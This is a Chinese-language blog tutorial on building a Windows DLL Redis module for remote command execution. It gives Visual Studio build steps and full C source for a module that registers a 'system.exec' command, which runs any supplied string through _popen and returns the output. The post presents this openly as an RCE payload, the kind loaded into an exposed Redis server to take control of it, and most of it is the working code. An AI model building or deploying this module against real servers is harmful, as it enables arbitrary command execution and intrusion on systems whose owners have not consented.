编译 Windows 下的 Redis RCE 模块(DLL)
最开始 GitHub 上都是 Linux 的利用,没有 Windows 的,现在不知道有没有。
新建一个 C++工程。
选择 Windows 桌面向导
如上图
然后输入项目名。
选择动态链接库
勾选空项目。
添加头文件,现有项。
将redismodule.h添加进去。
然后新建一个源文件。
源文件,添加,新建项
名字:dllmain.c不是.cpp 是.c
然后输入下面内容:
复制
// dllmain.cpp : 定义 DLL 应用程序的入口点。 #include "redismodule.h" #include <stdio.h> __declspec(dllexport) int RedisModule_OnLoad(RedisModuleCtx* ctx, RedisModuleString** argv, int argc); int DoCommand(RedisModuleCtx* ctx, RedisModuleString** argv, int argc) { if (argc == 2) { size_t cmd_len; size_t size = 1024; char* cmd = RedisModule_StringPtrLen(argv[1], &cmd_len); FILE* fp = _popen(cmd, "r"); char* buf, * output; buf = (char*)malloc(size); output = (char*)malloc(size); while (fgets(buf, sizeof(buf), fp) != 0) { if (strlen(buf) + strlen(output) >= size) { output = realloc(output, size << 2); size <<= 1; } strcat_s(output, size, buf); } RedisModuleString* ret = RedisModule_CreateString(ctx, output, strlen(output)); RedisModule_ReplyWithString(ctx, ret); _pclose(fp); } else { return RedisModule_WrongArity(ctx); } return REDISMODULE_OK; } int RedisModule_OnLoad(RedisModuleCtx* ctx, RedisModuleString** argv, int argc) { if (RedisModule_Init(ctx, "system", 1, REDISMODULE_APIVER_1) == REDISMODULE_ERR) return REDISMODULE_ERR; if (RedisModule_CreateCommand(ctx, "system.exec", DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR) return REDISMODULE_ERR; return REDISMODULE_OK; }
右键项目,属性。
选择 release,配置属性,C/C++,预编译头,选择不使用预编译头,保存。
右键项目,生成。
生成完毕,下面测试。
正常载入,命令正常。
已编译的 DLL 与 redismodule.h 见附件。
参考:
https://cloud.tencent.com/developer/article/1781255
https://djhons.com/2021/10/29/61.html
https://github.com/djhons/redis_rce/
原文地址
Windows 下编译 RedisRCE 模块(DLL)@墨雪飘影
https://wiki.shikangsi.com/post/3676/
大佬是真能折腾